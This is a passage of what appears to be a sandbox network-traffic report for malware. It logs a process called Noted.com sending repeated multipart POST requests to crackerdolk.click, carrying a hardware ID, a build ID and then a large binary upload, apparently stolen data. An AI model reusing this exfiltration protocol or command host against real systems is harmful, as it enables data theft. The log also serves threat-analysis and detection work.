                                      2024-12-28 08:13:26 UTC | 1369 | IN | Data Raw: 6a 53 64 35 6c 48 47 75 30 45 54 77 35 46 38 75 6b 58 56 30 6c 46 63 37 5a 53 4a 53 49 61 6a 77 30 4d 79 4f 35 37 58 61 5a 56 6e 5a 41 67 54 46 36 66 76 4e 50 62 48 6c 41 79 4b 52 4c 58 57 52 62 6d 34 6f 46 32 6f 39 70 62 6d 70 67 5a 2b 48 2f 47 2f 41 6a 4b 56 4c 4b 4a 6a 31 57 6a 54 59 31 4a 77 33 56 34 79 30 6a 46 45 53 52 6d 30 54 79 6a 32 31 2f 4c 43 30 78 2b 76 68 39 6a 69 63 75 54 38 49 6e 50 53 6a 39 56 7a 74 33 57 4a 72 42 48 68 41 6d 57 35 48 4a 4a 39 36 63 64 6e 4e 72 49 7a 2b 69 74 47 57 57 52 69 56 56 33 79 55 31 62 2f 38 51 4a 54 42 41 6c 4b 51 64 58 58 73 56 6c 34 45 57 32 59 4e 38 4d 47 70 74 66 36 4b 6e 61 39 64 47 4d 68 2b 58 65 33 51 6f 6f 56 64 6e 64 30 66 55 36 52 49 65 4c 56 61 45 6d 51 44 58 6d 6e 67 37 55 6c 31 55 37 37 55 67 77 41
                                      Data Ascii: jSd5lHGu0ETw5F8ukXV0lFc7ZSJSIajw0MyO57XaZVnZAgTF6fvNPbHlAyKRLXWRbm4oF2o9pbmpgZ+H/G/AjKVLKJj1WjTY1Jw3V4y0jFESRm0Tyj21/LC0x+vh9jicuT8InPSj9Vzt3WJrBHhAmW5HJJ96cdnNrIz+itGWWRiVV3yU1b/8QJTBAlKQdXXsVl4EW2YN8MGptf6Kna9dGMh+Xe3QooVdnd0fU6RIeLVaEmQDXmng7Ul1U77UgwA


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.5 | 49738 | 104.21.80.14 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-12-28 08:13:27 UTC | 278 | OUT | POST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=VIIPI8FN01MEB
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 12802
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:27 UTC | 12802 | OUT | Data Raw: 2d 2d 56 49 49 50 49 38 46 4e 30 31 4d 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 42 35 44 46 32 38 46 31 31 42 30 38 44 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 56 49 49 50 49 38 46 4e 30 31 4d 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 49 49 50 49 38 46 4e 30 31 4d 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 56 49 49 50 49 38 46 4e 30 31 4d 45 42 0d
                                      Data Ascii: --VIIPI8FN01MEBContent-Disposition: form-data; name="hwid"BC0B5DF28F11B08D8246926E533C64D7--VIIPI8FN01MEBContent-Disposition: form-data; name="pid"2--VIIPI8FN01MEBContent-Disposition: form-data; name="lid"jMw1IE--l3--VIIPI8FN01MEB
                                      2024-12-28 08:13:28 UTC | 1127 | IN | HTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:28 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=vga167i12vbt0hinivb13t4amh; expires=Wed, 23 Apr 2025 02:00:07 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGCJ5gijiReD43sq7BNakrxcfhRdKDaR5NhPFZ0Vj9USmg9jRP4m8beXNtJuwGnC3CSMJRTaQkC2vkyxjQJeDoaJXYgyOM7aQiyHpOU43f4xkeRdfBkfxiKeuiHSdqQ2a4cAOg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f9017599b1d7d05-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2000&min_rtt=1985&rtt_var=774&sent=10&recv=17&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13738&delivery_rate=1386514&cwnd=195&unsent_bytes=0&cid=323270b01428a920&ts=939&x=0"
                                      2024-12-28 08:13:28 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2024-12-28 08:13:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      3 | 192.168.2.5 | 49744 | 104.21.80.14 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-12-28 08:13:29 UTC | 279 | OUT | POST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=GK175PZ75M1UY3
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 15050
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:29 UTC | 15050 | OUT | Data Raw: 2d 2d 47 4b 31 37 35 50 5a 37 35 4d 31 55 59 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 42 35 44 46 32 38 46 31 31 42 30 38 44 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 47 4b 31 37 35 50 5a 37 35 4d 31 55 59 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 4b 31 37 35 50 5a 37 35 4d 31 55 59 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 47 4b 31 37 35 50 5a 37 35 4d 31
                                      Data Ascii: --GK175PZ75M1UY3Content-Disposition: form-data; name="hwid"BC0B5DF28F11B08D8246926E533C64D7--GK175PZ75M1UY3Content-Disposition: form-data; name="pid"2--GK175PZ75M1UY3Content-Disposition: form-data; name="lid"jMw1IE--l3--GK175PZ75M1
                                      2024-12-28 08:13:30 UTC | 1131 | IN | HTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:30 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=428sm9pffekpiph6r15g8uss5c; expires=Wed, 23 Apr 2025 02:00:09 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6da5TGXtnS3885hIzyijqkbXgNwMl7x6KURwilHL965QENZCqjuYoelYCI%2BPCpIFFtjImsJEeV9azvG7qWoVHG3SO1TdJk5%2F5SJy3saSMQUl3uxlAoBTwqtDTquzBvgPoYuM2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f9017670be97d05-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2004&rtt_var=766&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15987&delivery_rate=1414728&cwnd=195&unsent_bytes=0&cid=423a7f3ddb197726&ts=935&x=0"
                                      2024-12-28 08:13:30 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2024-12-28 08:13:30 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      4 | 192.168.2.5 | 49750 | 104.21.80.14 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-12-28 08:13:32 UTC | 273 | OUT | POST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=WX4W87C9
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 20504
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:32 UTC | 15331 | OUT | Data Raw: 2d 2d 57 58 34 57 38 37 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 42 35 44 46 32 38 46 31 31 42 30 38 44 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 57 58 34 57 38 37 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 58 34 57 38 37 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 57 58 34 57 38 37 43 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e
                                      Data Ascii: --WX4W87C9Content-Disposition: form-data; name="hwid"BC0B5DF28F11B08D8246926E533C64D7--WX4W87C9Content-Disposition: form-data; name="pid"3--WX4W87C9Content-Disposition: form-data; name="lid"jMw1IE--l3--WX4W87C9Content-Disposition
                                      2024-12-28 08:13:32 UTC | 5173 | OUT | Data Raw: 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 75 3f 0d 00 00 00 00
                                      Data Ascii: un 4F([:7s~X`nO`i`u?
                                      2024-12-28 08:13:33 UTC | 1137 | IN | HTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:33 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=43d94kit5vme28ni5nvlpc9j3u; expires=Wed, 23 Apr 2025 02:00:11 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QwWm3TDCDXVCxzg%2BG0VrC9%2FPBRABeoTbTiMs7ML1gftQLpmjxSvbHwVvbTkLSh17ZRpBpQVM%2FZh8zBtlIwVyjfl%2FnwtASXWuRIp5loM6gXOnFxkbjJQlwll%2FhzCPAI6WtTklUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f9017756d6f7d05-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1957&min_rtt=1953&rtt_var=741&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21457&delivery_rate=1468074&cwnd=195&unsent_bytes=0&cid=deab2470a1062f0c&ts=968&x=0"
                                      2024-12-28 08:13:33 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2024-12-28 08:13:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      5 | 192.168.2.5 | 49756 | 104.21.80.14 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-12-28 08:13:34 UTC | 282 | OUT | POST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=WFZFUTULE9E3NLKXYA
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 5473
                                      Host: crackerdolk.click
                                      2024-12-28 08:13:34 UTC | 5473 | OUT | Data Raw: 2d 2d 57 46 5a 46 55 54 55 4c 45 39 45 33 4e 4c 4b 58 59 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 42 35 44 46 32 38 46 31 31 42 30 38 44 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 57 46 5a 46 55 54 55 4c 45 39 45 33 4e 4c 4b 58 59 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 46 5a 46 55 54 55 4c 45 39 45 33 4e 4c 4b 58 59 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d
                                      Data Ascii: --WFZFUTULE9E3NLKXYAContent-Disposition: form-data; name="hwid"BC0B5DF28F11B08D8246926E533C64D7--WFZFUTULE9E3NLKXYAContent-Disposition: form-data; name="pid"1--WFZFUTULE9E3NLKXYAContent-Disposition: form-data; name="lid"jMw1IE--l3-
                                      2024-12-28 08:13:35 UTC | 1131 | IN | HTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:35 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=ioug8c0lh9e5vjhm9kho4sgffe; expires=Wed, 23 Apr 2025 02:00:14 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PDGif0Y15UWpaznyoIxVz9ooxnLywecr6W8Yqiz%2FH1hDmaJvQO7bJ2BHJlHW2Iwrp993o3wzgmCz3%2FxJbU4tiWPCG1AY7moEUomOuyYU4VImMyaMhANbY4yk4IuwVW%2BBseXESw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f9017851ec643e9-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1700&rtt_var=647&sent=7&recv=11&lost=0&retrans=0&sent_bytes=2841&recv_bytes=6391&delivery_rate=1678160&cwnd=242&unsent_bytes=0&cid=1f7fe3adaf2eccfe&ts=783&x=0"
                                      2024-12-28 08:13:35 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                      Data Ascii: fok 8.46.123.189
                                      2024-12-28 08:13:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      6 | 192.168.2.5 | 49762 | 104.21.80.14 | 443 | 1276 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-12-28 08:13:36 UTC | 272 | OUT | POST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=A5ITWVH5
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 1201
                                      Host: crackerdolk.click
2024-12-28 08:13:36 UTC | 1201 | OUT | Data Raw: 2d 2d 41 35 49 54 57 56 48 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 42 35 44 46 32 38 46 31 31 42 30 38 44 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 41 35 49 54 57 56 48 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 35 49 54 57 56 48 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 41 35 49 54 57 56 48 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e
                                      Data Ascii: --A5ITWVH5Content-Disposition: form-data; name="hwid"BC0B5DF28F11B08D8246926E533C64D7--A5ITWVH5Content-Disposition: form-data; name="pid"1--A5ITWVH5Content-Disposition: form-data; name="lid"jMw1IE--l3--A5ITWVH5Content-Disposition
2024-12-28 08:13:37 UTC | 1136 | IN | HTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:37 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=ppgc89qokcoglk8tbfqrtdsjou; expires=Wed, 23 Apr 2025 02:00:16 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDE7oApaNsDCWzbcaPOTd6%2F0FAxaNw92Hw2l7jp%2BR0Luz4Vh7Ls1oIpmm55XrPVCN29XuRsn68KsMMOHX%2BrnLz%2FI%2F3YRMmYUxqG%2BCOKhCMrkuDWvnHsZA8uuIpgp7iPppIH26w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f9017921acd8c0f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1911&min_rtt=1886&rtt_var=757&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2109&delivery_rate=1399808&cwnd=223&unsent_bytes=0&cid=c9b613d5a64bd96f&ts=816&x=0"
2024-12-28 08:13:37 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-28 08:13:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49768 | Destination IP: 104.21.80.14 | Destination Port: 443 | PID: 1276 | Process: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
Timestamp | Bytes transferred | Direction | Data
2024-12-28 08:13:39 UTC | 274 | OUT | POST /api HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: multipart/form-data; boundary=OZ3O7DI1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                      Content-Length: 574908
                                      Host: crackerdolk.click
2024-12-28 08:13:39 UTC | 15331 | OUT | Data Raw: 2d 2d 4f 5a 33 4f 37 44 49 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 43 30 42 35 44 46 32 38 46 31 31 42 30 38 44 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 4f 5a 33 4f 37 44 49 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 5a 33 4f 37 44 49 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 6c 33 0d 0a 2d 2d 4f 5a 33 4f 37 44 49 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e
Data Ascii: --OZ3O7DI1Content-Disposition: form-data; name="hwid"BC0B5DF28F11B08D8246926E533C64D7--OZ3O7DI1Content-Disposition: form-data; name="pid"1--OZ3O7DI1Content-Disposition: form-data; name="lid"jMw1IE--l3--OZ3O7DI1Content-Disposition
2024-12-28 08:13:39 UTC | 15331 | OUT | Data Raw: 4b 06 63 98 c2 a4 cf fa 93 f2 00 63 7b fc 3d de 9c 42 cb f2 d4 55 a7 18 ab 11 ce 99 e5 8b 52 67 d7 11 7c eb 49 89 fc 13 1b c1 8f b2 87 28 a7 e8 65 c6 e9 57 4a 69 05 1f ef d3 44 be 4e a9 b1 3b d5 f2 c3 d4 98 89 1f 23 34 2b 5b 03 18 06 ed ca 6f cf 39 eb 81 25 99 de dc ec c4 2b 7f ef 7f ff 41 24 4d 58 23 c5 db 10 eb af d3 93 ae e1 42 9a 44 1d 60 75 79 54 f2 8b 2a 9d d5 aa d9 6b d0 1a 34 5a 13 a4 74 db da 12 ca d1 43 a9 c9 ff 30 a8 45 3a b6 b8 78 ff e9 25 84 a3 15 42 63 97 f3 1e 9f fa 5b 97 eb 13 e3 75 2f f8 1d 29 db 15 fa 4b 6d 9e d4 19 73 4c b1 80 98 1a e6 5b 78 ce 45 80 3f 40 92 b4 76 63 34 21 95 7f 7b 3c 53 79 22 31 24 d2 6e 3d 2a e0 44 44 de a8 fe 69 41 5b 17 17 65 94 c1 2d 42 2f 7c 99 3b b2 34 13 0b c1 35 50 85 38 41 fb 3f b8 c8 03 98 b1 47 5e d9 5c 9b
Data Ascii: Kcc{=BURg|I(eWJiDN;#4+[o9%+A$MX#BD`uyT*k4ZtC0E:x%Bc[u/)KmsL[xE?@vc4!{<Sy"1$n=*DDiA[e-B/|;45P8A?G^\
2024-12-28 08:13:39 UTC | 15331 | OUT | Data Raw: f7 3e c6 96 cd db b8 61 66 96 67 48 05 ba cc 09 b9 58 88 bb f3 eb 84 73 e6 46 de d9 ba f4 83 9d e5 7c e2 b2 4d 59 ec 42 4a 90 12 31 0d d5 89 7e da 20 ca 96 1e fa a8 7b 02 8e d7 1c b2 ec 8c 0f 1b 8c 5f 73 ae e4 85 cb b1 0a cd 37 65 8d 49 e6 14 cf 92 f8 64 8e f0 8f 73 2e 58 ba aa b0 4c bf 82 05 e3 e0 66 49 4d 62 8c d5 87 43 ab 3d d6 6c 84 79 d8 ca 0d 7a 5d 36 ee 4d 54 59 10 95 44 91 be ee 98 82 1e 47 45 83 20 7f bc d8 d8 17 d1 84 7d ea 89 27 de 2a a7 2f 63 5f fb 15 5b 49 9c 3f c2 ee a8 44 cd cf 91 1b 63 94 bd 08 6b 77 a8 15 a8 80 42 aa 11 37 55 23 8d 25 62 72 22 9d 61 b5 e8 22 d4 41 da 59 20 ea 7a bb c3 e3 2f c2 63 65 06 f5 cd f7 c1 4e 86 39 f3 cf f4 43 54 d9 c9 a5 a5 87 c5 29 1e 0e 7b d3 4a e1 94 b0 10 cb 28 a5 ec 2e bf 85 c7 12 d2 63 86 b6 0d a2 b3 09 38
Data Ascii: >afgHXsF|MYBJ1~ {_s7eIds.XLfIMbC=lyz]6MTYDGE }'*/c_[I?DckwB7U#%br"a"AY z/ceN9CT){J(.c8
